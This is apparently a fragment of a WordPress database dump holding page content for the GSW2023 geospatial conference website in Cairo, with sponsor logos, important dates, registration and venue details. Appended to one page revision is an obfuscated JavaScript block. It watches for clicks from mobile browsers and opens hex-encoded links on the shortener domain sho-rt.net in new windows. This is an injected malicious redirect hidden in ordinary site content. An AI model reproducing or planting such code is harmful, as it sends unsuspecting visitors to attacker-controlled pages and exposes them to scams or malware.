/></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:44:11','2023-05-16 01:44:11','',3066,'https://gsw2023.com/?p=4493',0,'revision','',0),
(4494,1,'2023-05-16 01:48:37','2023-05-16 01:48:37','','image005','','inherit','open','closed','','image005','','','2023-05-16 01:48:37','2023-05-16 01:48:37','',3066,'https://gsw2023.com/wp-content/uploads/2023/05/image005.png',0,'attachment','image/png',0),
(4495,1,'2023-05-16 01:50:33','2023-05-16 01:50:33','','egyptair','','inherit','open','closed','','egyptair','','','2023-05-16 01:50:33','2023-05-16 01:50:33','',3066,'https://gsw2023.com/wp-content/uploads/2023/05/egyptair.png',0,'attachment','image/png',0),
(4496,1,'2023-05-16 01:51:05','2023-05-16 01:51:05','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px 